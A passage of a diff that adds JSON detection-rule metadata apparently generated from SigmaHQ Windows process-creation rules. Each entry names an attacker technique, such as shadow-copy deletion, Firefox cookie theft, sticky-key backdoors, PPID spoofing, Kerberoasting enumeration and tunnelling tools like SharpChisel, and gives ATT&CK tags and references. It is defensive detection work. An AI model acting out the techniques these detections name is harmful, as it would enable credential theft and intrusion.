suspicious child process (e.g. 
used in exploits for Follina / CVE-2022-30190)", + "uuid": "f3d39c45-de1a-4486-a687-ab126124f744", + "value": "Sdiagnhost Calling Suspicious Child Process", + "meta": { + "refs": [ + "https://twitter.com/nao_sec/status/1530196847679401984", + "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/", + "https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1218" + ], + "creation_date": "2022/06/01", + "filename": "proc_creation_win_sdiagnhost_susp_child.yml", + "author": "Nextron Systems", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", + "uuid": "52ff7941-8211-46f9-84f8-9903efb7077d", + "value": "PPID Spoofing Tool Usage", + "meta": { + "refs": [ + "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/", + "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks", + "https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing", + "https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_selectmyparent.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1134.004" + ], + "creation_date": "2022/07/23", + "filename": "proc_creation_win_selectmyparent.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects manual service 
execution (start) via system utilities.", + "uuid": "2a072a96-a086-49fa-bcb5-15cc5a619093", + "value": "Service Execution", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_service_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2019/10/21", + "filename": "proc_creation_win_service_execution.yml", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administrator or user executes a service for legitimate reasons." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a windows service to be stopped", + "uuid": "eb87818d-db5d-49cc-a987-d5da331fbd90", + "value": "Stop Windows Service", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_service_stop.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ], + "creation_date": "2019/10/23", + "filename": "proc_creation_win_service_stop.yml", + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", + "level": "low", + "falsepositive": [ + "Administrator shutting down the service due to upgrade or removal purposes" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects use of executionpolicy option to set insecure policies", + "uuid": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", + "value": "Change PowerShell Policies to an Insecure Level", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", + 
"https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", + "https://adsecurity.org/?p=2604", + "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2021/11/01", + "filename": "proc_creation_win_set_policies_to_unsecure_level.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Administrator script" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "uuid": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", + "value": "Deletion of Volume Shadow Copies via WMI with PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", + "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadowcopy_deletion_via_powershell.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ], + "creation_date": "2022/09/20", + "filename": "proc_creation_win_shadowcopy_deletion_via_powershell.yml", + "author": "Tim Rauch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Shadow Copies storage symbolic link creation using operating systems utilities", + "uuid": "40b19fa6-d835-400c-b301-41f3a2baacaf", + "value": "Shadow 
Copies Access via Symlink", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_access_symlink.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" + ], + "creation_date": "2019/10/22", + "filename": "proc_creation_win_shadow_copies_access_symlink.yml", + "author": "Teymur Kheirkhabarov, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administrator working with shadow copies, access for backup purposes" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Shadow Copies creation using operating systems utilities, possible credential access", + "uuid": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", + "value": "Shadow Copies Creation Using Operating Systems Utilities", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_creation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1003.002", + "attack.t1003.003" + ], + "creation_date": "2019/10/22", + "filename": "proc_creation_win_shadow_copies_creation.yml", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administrator working with shadow copies, access for backup purposes" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Shadow Copies deletion using operating systems utilities", + "uuid": "c947b146-0abc-4c87-9c64-b17e9d7274a2", + "value": "Shadow 
Copies Deletion Using Operating Systems Utilities", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://blog.talosintelligence.com/2017/05/wannacry.html", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/", + "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/", + "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", + "https://github.com/Neo23x0/Raccine#the-process", + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar", + "https://redcanary.com/blog/intelligence-insights-october-2021/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.impact", + "attack.t1070", + "attack.t1490" + ], + "creation_date": "2019/10/22", + "filename": "proc_creation_win_shadow_copies_deletion.yml", + "author": "Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", + "level": "high", + "falsepositive": [ + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", + "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of SharpUp, a tool for local privilege escalation", + "uuid": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", + "value": "SharpUp PrivEsc Tool", + "meta": { + "refs": [ + "https://github.com/GhostPack/SharpUp", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharpup.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1615", + "attack.t1569.002", + "attack.t1574.005" + ], + "creation_date": "2022/08/20", + "filename": "proc_creation_win_sharpup.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "uuid": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", + "value": "SharpChisel Usage", + "meta": { + "refs": [ + "https://github.com/shantanu561993/SharpChisel", + "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090.001" + ], + "creation_date": "2022/09/05", + "filename": "proc_creation_win_sharp_chisel_usage.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Some false positives may occure with other tools with similar commandlines" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. 
log4j exploitation)", + "uuid": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", + "value": "Shells Spawned by Java", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shell_spawn_by_java.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ], + "creation_date": "2021/12/17", + "filename": "proc_creation_win_shell_spawn_by_java.yml", + "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate calls to system binaries", + "Company specific internal usage" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious child process of a Windows shell", + "uuid": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", + "value": "Windows Shell Spawning Suspicious Program", + "meta": { + "refs": [ + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shell_spawn_susp_program.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1059.005", + "attack.t1059.001", + "attack.t1218" + ], + "creation_date": "2018/04/06", + "filename": "proc_creation_win_shell_spawn_susp_program.yml", + "author": "Florian Roth, Tim Shelton", + "level": "high", + "falsepositive": [ + "Administrative scripts", + "Microsoft SCCM" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects SILENTTRINITY stager use", + "uuid": "03552375-cc2c-4883-bbe4-7958d5a980be", + "value": "SILENTTRINITY Stager Execution", + "meta": { + "refs": [ + "https://github.com/byt3bl33d3r/SILENTTRINITY", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_silenttrinity_stage_use.yml" + ], + "tags": [ + "attack.command_and_control", + 
"attack.t1071" + ], + "creation_date": "2019/10/22", + "filename": "proc_creation_win_silenttrinity_stage_use.yml", + "author": "Aleksey Potapov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "uuid": "e13f668e-7f95-443d-98d2-1816a7648a7b", + "value": "Detected Windows Software Discovery", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", + "https://github.com/harleyQu1nn/AggressorScripts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518" + ], + "creation_date": "2020/10/16", + "filename": "proc_creation_win_software_discovery.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect attacker collecting audio via SoundRecorder application.", + "uuid": "83865853-59aa-449e-9600-74b9d89a6d6e", + "value": "Audio Capture via SoundRecorder", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", + "https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_soundrec_audio_capture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1123" + ], + "creation_date": "2019/10/24", + "filename": 
"proc_creation_win_soundrec_audio_capture.yml", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate audio capture by legitimate user." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Service Principal Name Enumeration used for Kerberoasting", + "uuid": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", + "value": "Possible SPN Enumeration", + "meta": { + "refs": [ + "https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_spn_enum.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ], + "creation_date": "2018/11/14", + "filename": "proc_creation_win_spn_enum.yml", + "author": "Markus Neis, keepwatch", + "level": "medium", + "falsepositive": [ + "Administrator Activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects dump of credentials in VeeamBackup dbo", + "uuid": "b57ba453-b384-4ab9-9f40-1038086b4e53", + "value": "VeeamBackup Database Credentials Dump", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml" + ], + "tags": [ + "attack.collection", + "attack.t1005" + ], + "creation_date": "2021/12/20", + "filename": "proc_creation_win_sqlcmd_veeam_dump.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of sqlite binary to query the Firefox cookies.sqlite database and steal the cookie 
data contained within it", + "uuid": "4833155a-4053-4c9c-a997-777fcea0baa7", + "value": "SQLite Firefox Cookie DB Access", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlite_firefox_cookies.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1539" + ], + "creation_date": "2022/04/08", + "filename": "proc_creation_win_sqlite_firefox_cookies.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "uuid": "2fdefcb3-dbda-401e-ae23-f0db027628bc", + "value": "Sticky Key Like Backdoor Usage", + "meta": { + "refs": [ + "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stickykey_like_backdoor.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" + ], + "creation_date": "2018/03/15", + "filename": "proc_creation_win_stickykey_like_backdoor.yml", + "author": "Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are 
\"activated\" the privilleged shell is launched.\n", + "uuid": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", + "value": "Sticky-Key Backdoor Copy Cmd.exe", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html", + "https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sticky_keys_unauthenticated_privileged_cmd_access.yml" + ], + "tags": [ + "attack.t1546.008", + "attack.privilege_escalation" + ], + "creation_date": "2020/02/18", + "filename": "proc_creation_win_sticky_keys_unauthenticated_privileged_cmd_access.yml", + "author": "Sreeman", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", + "uuid": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", + "value": "Execution via stordiag.exe", + "meta": { + "refs": [ + "https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html", + "https://twitter.com/eral4m/status/1451112385041911809", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stordiag_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2021/10/21", + "filename": "proc_creation_win_stordiag_execution.yml", + "author": "Austin Songer (@austinsonger)", + "level": "high", + "falsepositive": [ + "Legitimate usage of stordiag.exe." 
+ ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", + "uuid": "16905e21-66ee-42fe-b256-1318ada2d770", + "value": "Start of NT Virtual DOS Machine", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support", + "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7", + "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/", + "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/07/16", + "filename": "proc_creation_win_susp_16bit_application.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of 3proxy, a tiny free proxy server", + "uuid": "f38a82d2-fba3-4781-b549-525efbec8506", + "value": "3Proxy Usage", + "meta": { + "refs": [ + "https://github.com/3proxy/3proxy", + "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572" + ], + "creation_date": "2022/09/13", + "filename": "proc_creation_win_susp_3proxy_usage.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + 
"logsource.product": "windows" + } + }, + { + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "uuid": "9fbf5927-5261-4284-a71d-f681029ea574", + "value": "Compress Data and Lock With Password for Exfiltration With 7-ZIP", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_7z.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ], + "creation_date": "2021/07/27", + "filename": "proc_creation_win_susp_7z.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Command line parameter combinations that contain all included strings" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious 7zip execution that involves a file with a .dmp extension, which could be a step in a process of dump file exfiltration", + "uuid": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", + "value": "7Zip Compressing Dump Files", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_7zip_dmp.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ], + "creation_date": "2022/09/27", + "filename": "proc_creation_win_susp_7zip_dmp.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate use of 7-Zip with a command line in which .dmp appears accidentally" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious command line that adds an account to the local administrators/administrateurs group", + "uuid": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", + "value": "Add 
User to Local Administrators", + "meta": { + "refs": [ + "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2022/08/12", + "filename": "proc_creation_win_susp_add_local_admin.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "uuid": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", + "value": "Suspicious Add User to Remote Desktop Users Group", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml" + ], + "tags": [ + "attack.persistence", + "attack.lateral_movement", + "attack.t1133", + "attack.t1136.001", + "attack.t1021.001" + ], + "creation_date": "2021/12/06", + "filename": "proc_creation_win_susp_add_user_remote_desktop.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of a AdFind for enumeration based on it's commadline flags", + "uuid": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "value": "Suspicious AdFind Enumeration", + "meta": { + "refs": [ + "https://www.joeware.net/freetools/tools/adfind/", + "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002" + ], + "creation_date": "2021/12/13", + "filename": "proc_creation_win_susp_adfind_enumeration.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", + "uuid": "9a132afa-654e-11eb-ae93-0242ac130002", + "value": "AdFind Usage Detection", + "meta": { + "refs": [ + "https://www.joeware.net/freetools/tools/adfind/", + "https://thedfirreport.com/2020/05/08/adfind-recon/", + "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", + "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_usage.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" + ], + "creation_date": "2021/02/02", + "filename": "proc_creation_win_susp_adfind_usage.yml", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate admin activity" + ], + 
"logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,\nUsee to Query/modify DNS records for Active Directory integrated DNS via LDAP\n", + "uuid": "26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160", + "value": "Suspicious Execution of Adidnsdump", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adidnsdump.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ], + "creation_date": "2022/01/01", + "filename": "proc_creation_win_susp_adidnsdump.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of AdvancedRun utility", + "uuid": "d2b749ee-4225-417e-b20e-a8d2193cbb84", + "value": "Suspicious AdvancedRun Execution", + "meta": { + "refs": [ + "https://twitter.com/splinter_code/status/1483815103279603714", + "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", + "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml" + ], + "tags": "No established tags", + "creation_date": "2022/01/20", + "filename": "proc_creation_win_susp_advancedrun.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": 
"process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", + "uuid": "fa00b701-44c6-4679-994d-5a18afa8a707", + "value": "Suspicious AdvancedRun Runas Priv User", + "meta": { + "refs": [ + "https://twitter.com/splinter_code/status/1483815103279603714", + "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", + "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml" + ], + "tags": "No established tags", + "creation_date": "2022/01/20", + "filename": "proc_creation_win_susp_advancedrun_priv_user.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "uuid": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", + "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_athremotefxvgpudisablementcommand.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + 
